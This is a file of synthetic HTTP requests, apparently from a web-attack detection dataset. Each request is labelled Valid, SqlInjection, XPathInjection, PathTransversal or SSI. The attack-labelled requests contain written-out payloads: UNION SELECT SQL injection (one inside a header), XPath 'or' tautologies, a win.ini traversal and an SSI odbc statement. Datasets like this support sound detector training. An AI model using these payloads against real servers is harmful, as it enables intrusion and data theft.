~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 20539
Start - Id: 7894
class: Valid
POST /tXq9N9rF3t/npMIrTv../ni8hlge/nbccorwlol/8Csf/fnu2hbtotmoA/7d/ethn/ahlroae2nmti/3dpK/9r04cfg/nabaeEhwnar.bin? HTTP/1.0
Content-Length: 166
Content-Language: i6kqe,nk
Content-Encoding: compress
Content-Location: http://shndaaih.de/vmei/nEehaaf/hsrt.swf
Content-MD5: ZzRpaDM5TW5pdW9zZWRwdA==
Content-Type: application/x-www-form-urlencoded
Expires: Wed, 04 Jan 06 10:41:20 UTC
Last-Modified: Sun, 02 May 10 17:18:33 UTC
Host: 239.23.43.12
Connection: close
Accept: audio/*, audio/x-wav;q=0.3
Accept-Charset: x-mac-arabic;q=0.3, utf-8, iso-2022-kr;q=0.2, iso-8859-4;q=0.2, windows-1251;q=0.7
Accept-Encoding: *
Accept-Language: *
Cache-Control: only-if-cached
Client-ip: 194.50.167.30
Cookie: Rtea=execd;xtermHaWorcpiU=u);yfaNiydsyeaa=rlibk5ns;sso6hieiAsno=tkmoj;4s=6;hoFaaowsp=aigjbnrostnodee
Cookie2: $Version="00"
Date: Fri, 05 Jan 07 13:11:02 CET
ETag: "-22cLJtVOxTieij"
Expect: 100-continue
From: afrre@eioecipcc.biz
If-Modified-Since: Wed, 30 Apr 08 11:15:07 CET
If-Unmodified-Since: Fri, 20 Jun 08 14:30:33 GMT
If-Match: "0yMHa5YYPD43Dam34c"
If-None-Match: *
If-Range: *
Max-Forwards: 1
MIME-Version: 0.4
Pragma: sedls=eioa
Proxy-Authorization: NTLM MmJ1c2VQc29jYTQzQmFtTW1mQTNwc2l0bmF0bnRta2V1ZVJuZFN6ZWl3Zmhi
Authorization: Digest qop=auth
Range: 0284-605
Referer: /b6ne/10edle/fmcNiubu/tsdll/hEtH.mpeg
TE: trailers
Trailer: User-Agent
User-Agent: Mozilla/2.8 (Machintosh; U; Mac OS X 1.5; jc-in; rv:2.6.8) Gecko/77426901
UA-CPU: Sparc
UA-Disp: 9422,2675,16
UA-OS: FreeBSD
UA-Color: color16
UA-Pixels: 795x581
Via: HTTP/8.9 24.65.199.174, 7.0 237.209.209.45
Transfer-Encoding: ltat; nlcsoR6e=TotE
Upgrade: icEr/0.2, qtj/3.8, ic5/3.5
Warning: 457 58.248.149.253 "ghot6raooeReo" 
X-Forwarded-For: 115.221.199.254
X-Serial-Number: 534170749
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

fxAA9rHsu=;Tpsor$t&k5yRVsK37rXo=2epnodesaevaliEdr&nh2n5tvnh=87665&rhvec=ynehta8eAr&88=|wcuOieWte:dfn&eoean=35200&JZKVj7=9115&oboeeqI2yheg=es\t&efLslqoEEbe=7

End - Id: 7894
Start - Id: 45388
class: PathTransversal
POST /Pte9djNler.shtml? HTTP/1.0
Content-Length: 273
Content-Language: n0tpi,0ahsws,aec
Content-Encoding: gzip
Content-Location: /dEergwlb/aoi4.doc
Content-MD5: cmh5YW5ja2NuVEdhaGp5aQ==
Content-Type: application/x-www-form-urlencoded
Expires: Tue, 26 Oct 04 01:49:23 CET
Last-Modified: Tue, 21 Jun 05 21:25:17 UTC
Host: 227.58.239.126:020
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: euc-tw;q=0.3
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: l='eeazoht'
Client-ip: 2.231.241.65
Cookie: 4elkooEnbhlhrA=5849591
Cookie2: $Version="7"
Date: Mon, 11 Sep 06 20:54:58 GMT
ETag: W/"reqAMqHfAzn77w6eGvyA"
Expect: oepa
From: dr4hcedC@tene.com
If-Modified-Since: Mon, 23 May 05 19:11:08 CET
If-Unmodified-Since: Thu, 10 Mar 05 07:48:10 UTC
If-Match: "xa4PYB48JBd2Em_Em"
If-None-Match: *
If-Range: *
Max-Forwards: 831
MIME-Version: 1.9
Pragma: no-cache
Proxy-Authorization: Basic ZW9yc3M6dWRheTI=
Authorization: w5rt tanRog=ltsbt
Range: 49-
Referer: http://ltmt5r.it/pago/qair2a/nrtt.css
TE: trailers,deflate;q=0.2,trailers
Trailer: Max-Forwards
User-Agent: Mozilla/5.8 (compatible; MSIE 7.8; Open BSD i386; 2etucte)
UA-CPU: MIPS
UA-Disp: 721,775,32
UA-OS: Linux
UA-Color: color8
UA-Pixels: 789x027
Via: FTP/7.6 246.12.59.61, ffd/6.1 www.n9a89k.png, FTP/6.7 www.eby2op8y.tiff:928
Transfer-Encoding: gzip
Upgrade: y6otbe/1.0, A4me31/2.9, Aloea/2.4
Warning: 611 158.221.222.98 "nfsr5r0ueesqlqn" "Wed, 02 Mar 05 08:12:12 CET"
X-Forwarded-For: 177.133.223.189
X-Serial-Number: 37550564020499
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~

iuo=66126792&bBTbbNf8=bcb54ok&emmwkushtTm=i:\\WINNT\\win.ini&FformNSlocation@=eMm&sthcs=tDa&osioeC7r=pmbo&arAa=etlike6U&oedrr=bmd&7ce 9dbyprm&T55=271841&nsaicPRmemolsw=rV5XLQ&nieroi=n&e1Du=o0echo~t&dgsalfab=Rivsx6&Ideibf3e=nRos2poItrtsnio&toddtsr1A=7859824114

End - Id: 45388
Start - Id: 41211
class: SqlInjection
GET /0uimho4eo/snbrvDR/rP3Evn6EqFfdlr.sh?uiet=7likeEooEtlikea%2BsRa&cuaat=eytRoZamTmoo1&pteoreieGfI=utT+tyradiwcnt&zaawhiari5eOc=280&iefeiwvmedi=5739&sock_streamMYV=se-wygaee%27O&tv=iD7AXfJYyqp&c4Xgealo=ajnxoHf-jX&xp_xwU@-=29041814&ritataAraejsg=wox4tpetnuo1wowTe HTTP/1.0
Host: www.ioxsu.net
Connection: keep-alive
Accept: */*;q=0.0
Accept-Charset: *
Accept-Encoding: ;  EXEC( 'UNI'+'ON'+'   '+'SEL'+'ECT        'jnhrlw1p',3237,964,'lut',9   FROM omyRkad2iE)
Accept-Language: *
Cache-Control: no-transform
Client-ip: 146.208.88.192
Cookie: 3hnchild0include=&;ntadTsdeXntxhx=4457536;det1neii0=Ewinnt;86ia=e5oirghr
Cookie2: $Version="19"
Date: Sat, 03 Jul 04 24:24:22 GMT
ETag: "bcCurLCsm8JV-ngp"
Expect: 0LbSwo
From: ljOoeae@dayLl.cz
If-Modified-Since: Mon, 20 Jul 09 09:07:43 CET
If-Unmodified-Since: Mon, 14 Jan 08 05:06:08 GMT
If-Match: *
If-None-Match: *
If-Range: Tue, 31 Jul 07 08:17:54 UTC
Max-Forwards: 15
MIME-Version: 5.2
Pragma: eae7=lS7
Proxy-Authorization: muisi doaouyba=onhfte
Authorization: aEuSo 9dhabosO=esng
Range: 870-,33722-,80-34
Referer: http://www.oehse.com/eicd/eda8.swf
TE: trailers,trailers,gzip;q=0.8
Trailer: Expect
User-Agent: fr8th8vxrT/0.9
UA-CPU: MIPS
UA-Disp: 1760,871,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 9140x4441
Via: 9.2 www.anaal.css, 5.5 www.iokse.shtml
Transfer-Encoding: uqhl; otmxluh=ehfHeaO
Upgrade: Nqj9e/1.6
Warning: 096 28.130.214.30:40463 "bwtv1" "Wed, 03 May 06 17:00:25 UTC"
X-Forwarded-For: 148.0.118.253
X-Serial-Number: 9505530425947859
----: ----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41211
Start - Id: 25225
class: Valid
GET /hePUC9eDxAcxterm2/uZ5g0YBuMeqPM@ipPfn/opI/5likeoRRmetals3w4SSv.php4?3vg.KsmL=4506598&rniteeadlyei3o=eUoAI&0menmeICcYAg9E=da%3C%3Ee&0t=%3C&rdrhsgOztenA=aNJ&OjTQbTMEx=nef3dyth&4W@W=oi&mbesnapetdo8n0=v&aw=ooaalTe7&im1tenaodeenOs=4856&Oyex=tysbody&WZLRzFaT=78987&eeE9=20701723&ldytg0sehxEswQo=913&s7rihnhbw=2%24ucNi%7E+tu HTTP/1.1
Host: www.pooeehoye.de
Connection: keep-alive
Accept: video/mpeg, application/*;q=0.3, video/*
Accept-Charset: iso-2022-jp;q=0.4, windows-1258, x-mac-greek, iso-10646-ucs-2;q=0.3
Accept-Encoding: 
Accept-Language: d8Ctrh9t-o;q=0.4, eaaek-eaeiF;q=0.1, pps-nu8hseda, hzNeS-r;q=0.1
Cache-Control: max-stale
Client-ip: 188.84.7.22
Cookie: ihCn0oi3ans=lKTCaOI6JtC0;2i=0219;arsrLl9tb=73262968
Cookie2: $Version="140"
Date: Thu, 25 Feb 10 21:07:22 UTC
ETag: W/"9@I4d6_H7UPz_6.aVxtR"
Expect: Eieo7sz
From: k4NgNry@tf92Cos.be
If-Modified-Since: Thu, 21 Feb 08 20:08:20 CET
If-Unmodified-Since: Mon, 25 Apr 05 06:57:44 CET
If-Match: *
If-None-Match: *
If-Range: Tue, 07 Mar 06 07:46:47 CET
Max-Forwards: 3
MIME-Version: 0.9
Pragma: no-cache
Proxy-Authorization: Digest algorithm=MD5
Authorization: rthm icdu=lp1Ayatd
Range: 0953-9712,14819-971,55-
Referer: /j5lktt.rar
TE: trailers
Trailer: From
User-Agent: Mozilla/0.6 (Windows; U; Win 9x 1.3; en-ee; rv:0.4.7) Gecko/07251745
UA-CPU: PowerPC
UA-Disp: 468,067,32
UA-OS: Windows NT
UA-Color: color8
UA-Pixels: 386x0963
Via: aqeisE/6.7 224.216.230.219
Transfer-Encoding: identity
Upgrade: rrtpr/5.4
Warning: 490 www.n7rtrte.htm "6nrmt" 
X-Forwarded-For: 128.219.12.193
X-Serial-Number: 39906730696975900354
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 25225
Start - Id: 48933
class: XPathInjection
GET /1necilO33jaatpLas/tiWq2f8C_6Fx_.Z9FSpS/0so/oby/9qIW56Vtstdin24Ap./T-R_3New36OTiCC/f4Tp32V.JnQcej_hpC/3RUqukfu305.cgi?2f9cfHwJvutmp=linksttifs&lcmohgsYt2tu=Maoali2it8%3B&thfeas=owlnGseln56tSN&gTtvmcD86Oess=oahdpositionHI0dI&itrvhT=23794&pistesaFext5ts=wz4oukme&2istoas=pis66Ab%27+or++++renxb%2Fz%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D21%5D+++++or++%27ie%27+++%3D++++%27&TS9im4o=e6k5PEA%40bs&exoaeeoO1ep4fl=enjI%7CUcreai&stA0ztI41=9a&ueteOiv=610&ltips=7&cnoedusnr=otsin1Kac HTTP/1.1
Host: www.exdas.gov
Connection: keep-alive
Accept: text/*, video/mpeg, audio/*
Accept-Charset: iso-8859-4;q=0.4
Accept-Encoding: gzip;q=0.6
Accept-Language: *;q=0.2
Cache-Control: no-transform
Client-ip: 174.124.242.131
Cookie: oeeteownassIk=3101573;hrFruP=\libE;or7ereh=07818;tEXevalyr=lr Fbetween;dHC6=8670801387;lih2=eLO
Cookie2: $Version="7"
Date: Sun, 26 Dec 04 16:23:10 CET
ETag: "pu9Z2wUyy65gZhc"
Expect: 100-continue
From: 11ria@soa2e.be
If-Modified-Since: Sat, 30 Oct 04 04:32:58 GMT
If-Unmodified-Since: Fri, 27 Aug 04 17:59:05 CET
If-Match: "O7Sn0543aQHWUI_e9Dv"
If-None-Match: *
If-Range: "2LqXz-6PTMdWUtFd2M"
Max-Forwards: 2
MIME-Version: 6.7
Pragma: no-cache
Proxy-Authorization: Digest response="bDD9738c8b7dB2ba67BAcc1DF2f5adcE"
Authorization: Digest opaque="wasllza"
Range: 326-470558,-0121
Referer: http://wesarkgx.it/m2Eb/ysn6/tzrdrtB/eaie/qspt.gif
TE: trailers,trailers
Trailer: Trailer
User-Agent: slJiith3tftaoehfo
UA-CPU: 68000
UA-Disp: 6851,715,32
UA-OS: Win98
UA-Color: color8
UA-Pixels: 508x349
Via: FTP/0.4 www.aycmt5e.js
Transfer-Encoding: ttye6
Upgrade: tHifu/1.7
Warning: 800 139.238.82.6 "oepmrjghlc" 
X-Forwarded-For: 148.116.229.67
X-Serial-Number: 6293000915488
----: -----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48933
Start - Id: 17805
class: Valid
GET /iA/nO8sAKcDKqwHqz/bgcKAhH3UMcURi5c/nP/53tbp/6fBvCR6DxS0vU/ltmdr/iehieyeape3Urxp.dll?basRaawaAshmeep=Wii%27&YsrrmdosseYqiae=8057 HTTP/1.0
Host: www.oldo.de
Connection: keep-alive
Accept: */*;q=0.6
Accept-Charset: *
Accept-Encoding: compress;q=0.2, gzip, deflate;q=0.5
Accept-Language: *;q=0.4
Cache-Control: no-store
Client-ip: 163.146.76.142
Cookie: j49Nh=dsro;eanrouscl=aSAn:;ffPn=axCAF8;ns9vg=34
Cookie2: $Version="74"
Date: Wed, 26 Apr 06 15:20:22 CET
ETag: W/"_vPuMsZzKZ_7lToRk9"
Expect: 100-continue
From: srtj3sNt@uhxey.st
If-Modified-Since: Thu, 02 Jul 09 14:24:28 CET
If-Unmodified-Since: Tue, 05 Jun 07 01:40:23 CET
If-Match: "q-oQVwmIn_Yb7vXUWV"
If-None-Match: "KCdTZ9UG2.7K_@G"
If-Range: "EjUESR_PShjVsdoT"
Max-Forwards: 2
MIME-Version: 7.6
Pragma: no-cache
Proxy-Authorization: NTLM NmVnaWhlaUJpcE5zTmVvb3R1bW4yc2NBcjRlRXFFckVvTmhvbG4=
Authorization: NTLM ZXRlZGxtdGxlYWZ3ZXhsdWhqdGVTODhmdHRnZWF5YWVrZWxkOUxycm50Z3lRb2c=
Range: -542,05-69330,03-679
Referer: /pedoeRd.avi
TE: deflate;q=0.9
Trailer: Pragma
User-Agent: Mozilla/8.2 (X11; U; Open BSD i386 1.7; to-oo; rv:1.0.1) Gecko/31764374
UA-CPU: StrongARM
UA-Disp: 2638,7610,32
UA-OS: WinNT
UA-Color: color32
UA-Pixels: 942x1602
Via: 5.3 www.QAon.jpg:02656, 3.2 www.sseei.tiff:876
Transfer-Encoding: deflate
Upgrade: 2iphci/0.2
Warning: 772 19.4.250.196 "a2huUdChiyr6hamrt" 
X-Forwarded-For: 116.27.197.85
X-Serial-Number: 74706
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~

null

End - Id: 17805
Start - Id: 19060
class: Valid
GET /H0uX5nf/mwhH7WBEXaci/tX4C-PSaX/kv/axcZU/st1En/eBna57o/eI00sKXZpaE@AkrgURqZ/b9TnOrl2/pQ.sh? HTTP/1.1
Host: 71.167.152.80:80
Connection: w9tHCals
Accept: image/jpeg;q=0.6, application/*
Accept-Charset: ks_c_5601-1987;q=0.9, x-mac-icelandic, x-mac-arabic;q=0.9
Accept-Encoding: 
Accept-Language: XmuetNa-1mEsbh, tfy3R0ss-mt;q=0.5, a-aaeuwE;q=0.2, rte-uahaPaua, nhsmHscO-Haj5lspt
Cache-Control: max-age=64
Client-ip: 241.238.110.42
Cookie: itl1i=878;etwnenoilfid6h=linkerae;nz=364547
Cookie2: $Version="139"
Date: Sat, 24 Oct 09 12:40:58 UTC
ETag: W/"iFZ3v4f1P9ezQXFcZLr2"
Expect: dtwsiarI
From: meOreslm@oakuitLO.de
If-Modified-Since: Wed, 17 Sep 08 10:27:54 UTC
If-Unmodified-Since: Mon, 14 Apr 08 24:16:22 UTC
If-Match: "sLODgcBTe.5mFBCeUQcg"
If-None-Match: *
If-Range: *
Max-Forwards: 8
MIME-Version: 6.7
Pragma: Vmhap=t
Proxy-Authorization: NTLM Zm5yeW84TmZhZm9hYWl0c3N0OW5pNm4zZDd2ZnBkaGZuZWxtTmV2cnlhY3Ju
Authorization: Basic VGFicm5OOnM3aWlz
Range: 0-122,891-2377,320-202511
Referer: /tbRecw/sLrtgh/rbflnial/hm1tpG/llchra.swf
TE: trailers
Trailer: Upgrade
User-Agent: 4Ekewsss (tPWSLLaI; d@cEIxdhO; 4FB8BK)
UA-CPU: MIPS
UA-Disp: 087,0776,32
UA-OS: Windows 98
UA-Color: color8
UA-Pixels: 323x8856
Via: 0.5 www.asflwbqr.jpg, HTTP/1.7 95.75.115.5, 7.9 www.rNE2e.jpeg
Transfer-Encoding: compress
Upgrade: Nini/5.2, 1Sitkn/4.6
Warning: 437 24.24.24.100 "7MweOrlohfnta5faMmu" "Mon, 02 Apr 07 12:46:21 CET"
X-Forwarded-For: 203.182.207.188
X-Serial-Number: 2525148777282
----: ---------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 19060
Start - Id: 25672
class: Valid
GET /odpUnf/mnlYwaAI4/eaic4miwite2q/olzmRDeh/tS.39kXyQ25Oh/Mdrop71h/rlFRlWIbA.qk.nsf?JeO7eiRoohlcnle=n6a&aHtteuueoSrt=lclnansdsrvh HTTP/1.0
Host: 42.239.7.173
Connection: dgHb
Accept: */*
Accept-Charset: x-mac-korean, koi8, iso-2022-kr;q=0.1, iso-8859-2;q=0.2, iso-2022-kr;q=0.5
Accept-Encoding: 
Accept-Language: T-e;q=0.7, ysu-v;q=0.5, om-ohr5n;q=0.1, sewediq-linum
Cache-Control: no-transform
Client-ip: 227.133.53.190
Cookie: iecoui=71201;zt8oacLxbIh=ri;qOreplaceJ5kUPMRcK=370;sxahtlsp0aeocsn=70808
Cookie2: $Version="81"
Date: Fri, 17 Mar 06 16:24:58 UTC
ETag: "fUrmoEcADl1vOphaKG8T"
Expect: 100-continue
From: R4kbi1mn@laxnje.st
If-Modified-Since: Tue, 19 May 09 13:39:16 GMT
If-Unmodified-Since: Sat, 09 Apr 05 09:39:53 UTC
If-Match: "htiiuInGK-ouWZ_-d"
If-None-Match: *
If-Range: Tue, 05 Apr 05 20:16:56 GMT
Max-Forwards: 8836
MIME-Version: 1.7
Pragma: cfn=iNlge
Proxy-Authorization: NTLM c3lvb0VueWhlZm1iN2V4YW55QWRvZEc0MnN5NHNydGhzN2JkNW82dGc=
Authorization: NTLM YXNyc2FjWXNndG51Y3B5dTd0dzl1N3RzMnI5ZW5yY3VwdG1ic2N1aQ==
Range: 39509-,-41,-519051
Referer: http://olEeset.biz/Hseb/dilrtphu/m7erg/ooseI.gif
TE: chunked;q=0.0
Trailer: If-None-Match
User-Agent: Mozilla/7.3 (X11; U; Unix 1.4; wy-a7; rv:2.9.2) Gecko/11115872
UA-CPU: Sparc
UA-Disp: 564,067,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 8973x257
Via: 4.5 186.37.124.153
Transfer-Encoding: identity
Upgrade: src/0.7
Warning: 473 www.arroi44e.png "m5ao1xhonpTIDgipma3b" 
X-Forwarded-For: 236.247.161.119
X-Serial-Number: 33104741
----: ------------------
~~~~~: ~~~~~~~~~~

null

End - Id: 25672
Start - Id: 34310
class: Valid
PUT /F24imkYigidss/5Z/twoT/iAm/EI3Dexec-/WZ/ZiDyXKxASkk9@Y/nPA.bin? HTTP/1.1
Content-Length: 244
Content-Language: eu
Content-Encoding: deflate
Content-Location: http://www.ndSqf.cz/pcsq/rErts.php4
Content-MD5: bnRlc3pzb2ZhbHNsaXR0ZQ==
Content-Type: application/x-www-form-urlencoded
Expires: Mon, 04 Feb 08 15:12:28 CET
Last-Modified: Sun, 10 May 09 21:03:41 CET
Host: 85.164.22.15
Connection: hoattenf
Accept: */*
Accept-Charset: *;q=0.4
Accept-Encoding: *
Accept-Language: *
Cache-Control: no-transform
Client-ip: 62.67.135.59
Cookie: OCU9UkMbinRmOd=egxnhsd;iihgndt0fosaNi=snuitoiSrdAetsIWal;soewieha=ehmb<ztnT;tnbos41erica=neYegst9e;rk.j2=efYe&Fs9od0
Cookie2: $Version="8"
Date: Sat, 23 Sep 06 21:54:31 CET
ETag: W/"VWWRLlVUvTbM4pl"
Expect: dhub
From: ero2mi@qoXtxefele.cz
If-Modified-Since: Tue, 27 Apr 10 20:15:47 CET
If-Unmodified-Since: Thu, 03 Jan 08 22:40:42 GMT
If-Match: *
If-None-Match: "QGkYJ-hqMywlNjLmA"
If-Range: Mon, 06 Feb 06 17:28:01 GMT
Max-Forwards: 6774
MIME-Version: 7.7
Pragma: Iuanhyub='s'
Proxy-Authorization: Basic cGU0dGY6blFubmF1
Authorization: NTLM bm50RUJ5dVJza3RtZ3N5ZGU0aHlhdGh5b2VRbnN0OUVpc29hbmtjbngxaXNF
Range: -278160
Referer: /diyl/boepc/vzBqsas.conf
TE: trailers,gzip,gzip
Trailer: Authorization
User-Agent: snajo/3.0.6.0.0
UA-CPU: Sparc
UA-Disp: 693,674,16
UA-OS: Solaris
UA-Color: color8
UA-Pixels: 232x3371
Via: HTTP/5.3 255.172.120.53, Orr/3.3 163.88.143.30
Transfer-Encoding: m9hmDd
Upgrade: cce/2.3, smtfs/5.7, Ea5g/4.6
Warning: 586 92.14.205.241 "E3whryAhn" "Sat, 07 Feb 09 18:53:19 GMT"
X-Forwarded-For: 218.206.230.237
X-Serial-Number: 87969067575
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~

tlMaaTnimefcta= on kbin/neeb%i &eTli=45306980&De=by.6F4&wnnen1re=417742&QY698bHj=Sa3rpn&eee=51&uo=&nri)&nteotxesncirgo=1JDal2b&oe6blrpo=eF2o0p&keaoi=in&hae=wshutdownc&see5rtOiztgtio2=-h&4oiEe=oGIwpZIdJu@X&eEqd7oCijfs=52341&zdwicroi=A6

End - Id: 34310
Start - Id: 2311
class: Valid
GET /iIjPthretaagub6Sdel/niucrlmolmleims/nvVYmaPraq66tAAbr/xpEMPnbA.catB3/kmsS3xsdnnttisc.htm?rndyrh0=aoetH&update83a79U=o+mlInAUn%29&tmpZe5WmO_=v&6mochaHMBUucmdB4style=2272147477 HTTP/1.0
Host: www.irA9Sat0o.gov
Connection: keep-alive
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: max-age=20
Client-ip: 0.28.13.102
Cookie: bR=autoexec;Tpsd1_FbM3uKf=z7Ur:utixt:snalldiic0;cnshi0ov=99909377;sl6=7668060
Cookie2: $Version="92"
Date: Mon, 20 Nov 06 02:25:09 UTC
ETag: W/"73df4p-pvToZb6Oc"
Expect: 100-continue
From: ihre@EbpA8o.be
If-Modified-Since: Wed, 21 Apr 10 09:13:42 CET
If-Unmodified-Since: Sun, 11 Jul 04 22:44:55 UTC
If-Match: *
If-None-Match: *
If-Range: "Xfb8bP8i4F6jYDeSry"
Max-Forwards: 8
MIME-Version: 9.5
Pragma: eemaor='hTan'
Proxy-Authorization: NTLM dGNhMkhhRWU2bHNhaGF5d29ob2VvdWx0d2Vpc2Fjc2dpdDN0aXRvY25pd0g=
Authorization: gnsowf eeoIh=hR2dsnti
Range: 552922-3338
Referer: /ouij/efanseA/nq3ioEO/rnuTp/y7wk1bo.gif
TE: chunked;q=0.4
Trailer: Referer
User-Agent: uafwbte/3.1.7.0.0
UA-CPU: 68000
UA-Disp: 359,305,8
UA-OS: FreeBSD
UA-Color: color32
UA-Pixels: 6264x742
Via: HTTP/3.1 45.189.93.157, sth/3.5 111.142.233.85
Transfer-Encoding: deflate
Upgrade: s5e/9.1
Warning: 908 191.107.127.141 "abyoEaprw" 
X-Forwarded-For: 191.123.48.69
X-Serial-Number: 61486796053346804
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2311
Start - Id: 49945
class: XPathInjection
GET /g_6d0zUfKngqejHKvHv/qKMDnbKEjnlJu6w/e3rm.jpg?epsnrntiohbcg=kCbS%27+++or+++++rUci%2Flt%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D3%5D+++or++%27tiTEa%27%3D++%27&exthOtesebhqtap=EeTssio0y&WDrDoQIbM7nc0=yz2Twteltc&ylp5shlthhSsA=7t0nioaee1S+&pnpsiey=+%40nl&0-yVemocha0OWjIG=p3jH2p&trnp4u=ilMiDg_8A HTTP/1.0
Host: www.ottvaow.net
Connection: keep-alive
Accept: */*;q=0.9
Accept-Charset: x-mac-arabic;q=0.3, x-mac-greek, x-mac-icelandic, euc-jp, x-mac-arabic;q=0.2
Accept-Encoding: compress, identity, compress;q=0.4, compress;q=0.5
Accept-Language: nnq1-imobn9;q=0.4, qng-sat5Ee;q=0.8, sequ6vee-iBern7n1;q=0.6, ayho-ae;q=0.8
Cache-Control: min-fresh=38268
Client-ip: 6.57.199.123
Cookie: sfadtjtrnwninn=s ;hwcr=areox;hortk=3;ubVGjfgu=]asl ia;uyiii7o=3;cqrtimyymittenI=nNiCD
Cookie2: $Version="94"
Date: Tue, 26 Dec 06 05:48:01 CET
ETag: "lxemiDvLWMw9dQLdPP"
Expect: 100-continue
From: ntedRr@r9cY.gov
If-Modified-Since: Tue, 03 Jan 06 04:04:45 CET
If-Unmodified-Since: Sun, 26 Sep 04 21:06:05 UTC
If-Match: *
If-None-Match: *
If-Range: Thu, 21 Feb 08 17:02:51 UTC
Max-Forwards: 2841
MIME-Version: 6.1
Pragma: no-cache
Proxy-Authorization: NTLM ZWNuN2NibnJlbjJqZ253bWVlcnRXZmRvc2xvdmxubGllY2FyZWl3ZXBOd2w=
Authorization: evwOlt lsy3mt=9sciu
Range: 33-0
Referer: /eaes2H.php4
TE: trailers,trailers
Trailer: Expect
User-Agent: nxakihor (nC28NH; 8VluhF; ssO9K5G.; mXeWG00Fz)
UA-CPU: x86
UA-Disp: 2308,4283,16
UA-OS: Linux
UA-Color: color32
UA-Pixels: 299x2707
Via: 5.3 www.ento1.html:4
Transfer-Encoding: compress
Upgrade: d4T/6.8, oecM/8.1, tgey/1.2, v4dyl/2.5
Warning: 456 243.193.239.132 "aIeI4en5" "Fri, 30 Mar 07 09:51:48 CET"
X-Forwarded-For: 174.45.94.7
X-Serial-Number: 84157643689
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49945
Start - Id: 41966
class: SqlInjection
GET /n7nihbwr7ekhniyoLs/jNeo.gif?houoe8E3=%27++%29+UNION++ALL+SELECT+++++1147%2C94%2C7370%2C4%2C2854++FROM+++++zN6meqtoes++WHERE+++++%28+++%27%27++%3D++%27&ioFj=2445&reornrr=nD4xDo7g_nXz&nshgstsmzga=oXfLlw HTTP/1.0
Host: www.2pgck.uk
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: *;q=0.3
Accept-Language: *
Cache-Control: no-cache
Client-ip: 40.55.189.126
Cookie: e8=1265060264;eeuwoa=edDNL
Cookie2: $Version="813"
Date: Sat, 19 Apr 08 14:06:05 GMT
ETag: W/"4m-sPlFALVJXkVY1K"
Expect: 2eweYa=sefI;hdtn
From: 4zD9@jt6etwau5.be
If-Modified-Since: Mon, 15 Jan 07 20:24:15 UTC
If-Unmodified-Since: Mon, 03 May 10 20:05:42 GMT
If-Match: *
If-None-Match: "O1w-Jsqx72emG7d4wbl"
If-Range: Sat, 25 Sep 04 13:40:58 GMT
Max-Forwards: 75
MIME-Version: 0.8
Pragma: no-cache
Proxy-Authorization: Digest nonce
Authorization: Basic V2VibzppeXRRYmJo
Range: 991-40833,238399-36
Referer: http://www.o2ucmcea.biz/osTE/seonte.txt
TE: deflate,gzip;q=0.9,trailers
Trailer: Proxy-Authorization
User-Agent: 2P21krd http://www.mIYrhpd.cz
UA-CPU: MIPS
UA-Disp: 4298,556,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 329x4778
Via: 2.2 www.4dfrtE.shtml:066
Transfer-Encoding: identity
Upgrade: osgosN/1.6, nzpps/5.5, rhoft/4.2, feo/7.7, htler/3.3
Warning: 494 42.216.10.168:95428 "esi7pe3nyrrtei" "Wed, 28 Apr 10 16:07:09 UTC"
X-Forwarded-For: 88.3.128.18
X-Serial-Number: 41242078999326437
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 41966
Start - Id: 40886
class: SSI
GET /WSxfOPtelnetqs/adDS6ZvwUZ4-oUmRA/ihoenoaspTrmemeawo.jpeg?el=vtiaKt&oursheeaRR=umhgpzhLtivldce3p&lf89encodjae=olc2ede9nr&veEce21r66tyOoi=%3C%21--++%23odbc+connect%3D%22dnn%2Cionpo%2Cjtcln%22++++++++statement%3D%22select+++*++++from+e%22--%3E HTTP/1.1
Host: www.Gtavnf.com:80
Connection: enmnim
Accept: video/quicktime
Accept-Charset: x-mac-turkish;q=0.1
Accept-Encoding: gzip;q=0.3, compress;q=0.9
Accept-Language: *
Cache-Control: max-stale
Client-ip: 18.195.218.180
Cookie: D4hhnna6tgx=4076658244;xclohtoaafs=passwd ;1snnTien3rcH0=f0lK3Y;ctanrste6box=84989;z3tCnwise=emafauu;eireOUsO4ed=sock_streamroe
Cookie2: $Version="8"
Date: Sun, 18 Apr 04 22:37:57 GMT
ETag: W/"cdUEMz1rdtb6L7v"
Expect: iu4peePa=sip9hx
From: iead0@nuqh1.org
If-Modified-Since: Wed, 23 Jul 08 14:12:04 UTC
If-Unmodified-Since: Wed, 12 Apr 06 15:17:29 GMT
If-Match: *
If-None-Match: "kH4yqPhKCM4_MMJHXJ5o"
If-Range: Fri, 27 Nov 09 07:55:22 UTC
Max-Forwards: 4
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Basic dHQybmlKOmVtc3dzckFy
Authorization: dMod 5D9t4=toait6i
Range: 453-748
Referer: http://apit.be/HR52xop/oeeeq/errn.asmx
TE: trailers
Trailer: Accept-Charset
User-Agent: itBejwTfarey3P
